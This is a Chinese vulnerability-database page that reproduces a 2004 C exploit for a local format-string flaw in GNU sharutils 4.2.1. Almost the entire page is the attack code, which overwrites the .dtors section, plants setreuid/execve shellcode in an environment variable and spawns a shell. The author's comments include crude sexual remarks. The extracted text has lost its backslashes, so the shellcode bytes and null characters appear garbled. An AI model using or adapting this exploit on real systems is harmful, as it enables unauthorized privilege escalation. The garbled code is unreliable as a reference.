GNU Sharutils 4.2.1 – Local Format String

漏洞ID	1054641	漏洞类型
发布时间	2004-09-25	更新时间	2004-09-25
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/479

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* GNU sharutils <= 4.2.1 Local Format String POC Code
   
   C0ded by n4rk0tix (a.k.a nrktx) [email protected]
   
   Below is a l4m3 proof of concept code for da recently reported lame bug;
   These binaryz have not only format bugz, but also buffer overflowz,etc.We also
   exploited the heap and the stack hole of theze binaryz.There are almost 3 wayz of exploiting
   theze elfz ,both of them r fucking boring , though, so this one is.
   
   candy@labs:/$ readelf -r `which shar` | grep uid
   08050784 00000e07 R_386_JUMP_SLOT 08048d7c getpwuid
   080507e0 00002807 R_386_JUMP_SLOT 08048eec getuid
   candy@labs:/$
   
    exploiting non-suid binariez is like fucking 55 yearz old woman, like i did in this code :-]
    I'm again BACK from a long cisco trip, REGROUP TEAM, go go go... , need back up ! :]
   
    Also some greetingz signaled to: Efnet,gotcha(love from .*za :] ),dm(my netmate from madagaskar),
         genjuro(my lord a.k.a Uz4yh4N),L4M3R(vurun la ipnelere ehuehu,kibriti caktim, tinerci alisti ehuehe),
         HELl0wEeN,darkhat,mathmonkey,mtrl(68000 guru),jawz,and the otherz whom i excluded them accidently :)
   
   For More Info , read the below ascii trash. Thanx _EOF_
*/
   
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>

#define _GNU_SOURCE
#define DEFAULT_DTORS_SHAR (0x08050738) /*Tested on Slackware 9.0*/
#define DEFAULT_DTORS_UNSHAR (0x0804ad74) /* This is not exploitable on every systemz */
#define DEFAULT_OFFSET_SHAR 22
#define DEFAULT_OFFSET_UNSHAR 262 /*lol, wtf stack layout do i have :],Probably useless..*/
#define SHAR_PATH "/usr/bin/shar" /*Default $PATH change if needed*/
#define UNSHAR_PATH "/usr/bin/unshar"
#define GET_DTORS_CMD "objdump -h %s | grep .dtors | awk ' { print $4 } ' > %s"
#define NOP 0x90

static int16_t WBIN = 2;

int main(void) {
        
int16_t check_bin(void);
u_int32_t get_dtors(int8_t* path);
int16_t get_auto_stack_offset(int8_t *binpath);
void banner(void);

int8_t envbuf[1000];
int8_t store_env[1010];
int8_t *shar_path = SHAR_PATH;
int8_t *unshar_path = UNSHAR_PATH;
static u_int8_t shellcode[] = // setreuid(0,0)
        "x31xc0" // xor %eax,%eax
        "x31xdb" // xor %ebx,%ebx
        "x31xc9" // xor %ecx,%ecx
        "xb0x46" // mov $0x46,%al
        "xcdx80" // int $0x80
        
        // setgid(0)
        "x31xdb" // xor %ebx,%ebx
        "x89xd8" // mov %ebx,%eax
        "xb0x2e" // mov $0x2e,%al
        "xcdx80" // int $0x80
        
        // execve /bin/sh
        "x31xc0" // xor %eax,%eax
        "x50" // push %eax
        "x68x2fx2fx73x68" // push $0x68732f2f
        "x68x2fx62x69x6e" // push $0x6e69622f
        "x89xe3" // mov %esp,%ebx
        "x8dx54x24x08" // lea 0x8(%esp,1),%edx
        "x50" // push %eax
        "x53" // push %ebx
        "x8dx0cx24" // lea (%esp,1),%ecx
        "xb0x0b" // mov $0xb,%al
        "xcdx80" // int $0x80
 
        // exit();
        "x31xc0" // xor %eax,%eax
        "xb0x01" // mov $0x1,%al
        "xcdx80"; // int $0x80
 
     
banner();
if(!check_bin())
exit(EXIT_FAILURE);
 
memset(envbuf,NOP,sizeof(envbuf));
strcpy((int8_t *)&envbuf[sizeof(envbuf) - strlen(shellcode)],shellcode);
memcpy(store_env,"CANDY=",6);
strcat(store_env,envbuf);
putenv(store_env);
 if(!putenv) {
   if(errno == ENOMEM) {
   strerror(errno);
   exit(EXIT_FAILURE);
   }
 }
const int8_t *USEBIN;
int16_t USE_OFFSET;
        
if(WBIN == 1){
printf("[+]Exploiting the unshar binaryn");
USEBIN = unshar_path;
}
if(WBIN == 2){
printf("[+]Default binary is sharn");
USEBIN = shar_path;
}
if(WBIN == 3) {
printf("[+]Exploiting Shar binaryn");
USEBIN = shar_path;
}
        
int8_t store[200];

u_int32_t fakebuf = 0xbffffffa - strlen(store_env) - strlen("/usr/bin/shar") + 50;
        
u_int32_t write_dtors = get_dtors((int8_t *)USEBIN);
int8_t *dtors_target[3] =
        
               { (int8_t *) write_dtors + 2,
                 (int8_t *) write_dtors,
                  NULL
               };
        
 
int16_t env_most,
         env_low;


env_most = (fakebuf & 0xffff0000) >> 16 ;
env_low = (fakebuf & 0x0000ffff);


env_most -= 0x8;
USE_OFFSET = get_auto_stack_offset((int8_t *)USEBIN);
 
sprintf(store,"%s%%.%dx%%%d$hn%%.%dx%%%d$hn",
   
                &dtors_target,
                (u_int16_t)env_most,
                USE_OFFSET,
                (env_low - env_most) - 0x8,


                USE_OFFSET + 1);

fprintf(stdout,"[+]Type some command,sh$ prompt may not occurn");
fprintf(stdout,"[+]Terminal echoing is possibly off n");
fprintf(stdout,"Type any shell command Here i.e 'id' or 'ps aux'n");
execlp(USEBIN,USEBIN,store);
fflush(stdin);
fflush(stdout);
return EXIT_SUCCESS; // useless, never return
}




int16_t check_bin(void) {
 
 int8_t *filename_shar = SHAR_PATH;
 int8_t *filename_unshar = UNSHAR_PATH;
 int16_t i = 2;
  if( access(filename_shar,F_OK) != 0){
   fprintf(stderr,"%s Not found, Checking %sn",filename_shar,filename_unshar);
   i--;
   WBIN = 1;
   }

 if( access(filename_unshar,F_OK) != 0) {
  fprintf(stderr,"%s Not foundn",filename_unshar);
   i--;
   WBIN = (WBIN == 1) ? 0 : 3;
   }
 if(!i) {
   fprintf(stderr,"Sorry dude, no binary available for exploiting.n");
   exit(EXIT_FAILURE);
   }
 fputs("[+]Binary checking passedn",stdout);
 return(i);
}

u_int32_t get_dtors(int8_t* path) {
 
 FILE *readit;
 int *tmpfile;
 int8_t tmpfull[32];
 char *store_dtors;
 
 int16_t status;
 int16_t length;
 
 ssize_t read;
 u_int32_t findme;
 int8_t *dtorsbuf = NULL;
 bzero((int8_t *)tmpfull,sizeof(tmpfull));
 
 strncpy(tmpfull,"/tmp/candyXXXXXX",strlen("/tmp/candyXXXXXX"));
 tmpfile = (int *)mkstemp((int8_t *)tmpfull);
 int8_t *buffer = (int8_t *) malloc(100 * sizeof(int8_t *));
 if(!malloc) { err(1,"malloc"); exit(EXIT_FAILURE); }
 
 bzero(buffer,sizeof(buffer));
 snprintf(buffer,100,GET_DTORS_CMD,path,tmpfull);
 buffer[strlen(buffer)] = '';
 
 int8_t *shar_path = SHAR_PATH;
 status = system(buffer);
 

 switch((status >> 8 ) & 0xff) {
          
          case 0:
          fprintf(stdout,"[+]Utilities check successful, no Need Defaultsn");
          break;
          
          case !0:
          fprintf(stdout,"[+]Using default .Dtors addressn");
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;
          
          default:
          fprintf(stdout,"[+]Using default .Dtors addressn");
          fprintf(stdout,"[+]Dtors address => 0x%xn",DEFAULT_DTORS_SHAR );
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;
   }
    
 
       
       if ( (readit = fopen(tmpfull,"rb")) == NULL ) {
          strerror(errno);
          fprintf(stdout,"[+]Using default .Dtors addressn");
          findme = (path == shar_path) ? DEFAULT_DTORS_SHAR : DEFAULT_DTORS_UNSHAR;
          goto GO_ON;
          }
          read = getline(&dtorsbuf,&length,readit);
       
     fflush(readit);
     dtorsbuf[strlen(dtorsbuf) -1 ] = '';
     findme = strtoul(dtorsbuf,&store_dtors,16);
     
     fclose(readit);
     free(dtorsbuf);
     unlink(tmpfull);
     fprintf(stdout,"[+]Dtors address found => 0x%xn",findme + 0x4);
GO_ON:
     unlink(tmpfull); /* For System Crashes */
     return(findme + 4);
}
 

int16_t get_auto_stack_offset(int8_t *binpath) {

 int8_t *path = "/tmp/candy";
 int8_t *buffer = (int8_t *)malloc(300*sizeof(int8_t));
 int8_t *shar_path = SHAR_PATH;
 
 FILE *fd;
 static int8_t formatbuf[100];
 const u_int8_t *end_the_format = "41414141";
 
 int8_t *format_string = "%x";
 int8_t progpath[40];
 
 bzero(progpath,sizeof(progpath));
 sprintf(progpath,"%s AAAA",binpath);
 progpath[strlen(progpath)] = '';
 
 static int16_t control = 1;
 static int16_t offset = 1;
     if ((fd = fopen(path,"wb")) == NULL) {
     perror("fopen");
     exit(1);
    }
 if(control != 1)
 goto FIRSTJUMP;

 fflush(stderr);
 dup2(fileno(fd),2);
 
 bzero(formatbuf,sizeof(formatbuf));
 strncpy(formatbuf,progpath,strlen(progpath));
  
LOOP:
    if ((fd = fopen(path,"wb")) == NULL) {
      perror("fopen");
      exit(1);
      }
 fflush(stderr);
 dup2(fileno(fd),2);

FIRSTJUMP:
 
 control++;
 strcat(formatbuf,format_string);
 
 system(formatbuf);
 fclose(fd);
 usleep(9999);
 
 fd = fopen(path,"rb");
 if(fd == NULL){
 perror("open");
 fprintf(stdout,"[+]Using default Stack Offset n");
 offset = (binpath == shar_path) ? DEFAULT_OFFSET_SHAR : DEFAULT_OFFSET_UNSHAR;
 goto JUMP;
 }
    
   if(fgets(buffer,300,fd) != NULL){

     if( strstr(buffer,end_the_format) == NULL) {
     free(buffer);
     fclose(fd);
     offset++;
     goto LOOP;
     }
     
 free(buffer);
 fclose(fd);
 unlink(path);
}
 fprintf(stdout,"[+]Using Stack Offset %dn",offset);
 JUMP:
 return(offset);
 }

void banner(void) {
fputs("tGNU SharUtils <= 4.2.1 Local Format String Exploitn"
      "[email protected]",stdout);
}


// milw0rm.com [2004-09-25]

相关推荐: MySQL Null Root Password Weak Default Configuration Vulnerability

MySQL Null Root Password Weak Default Configuration Vulnerability 漏洞ID 1101661 漏洞类型 Configuration Error 发布时间 2002-08-19 更新时间 2002-…

文章版权归作者所有，未经允许请勿转载。

THE END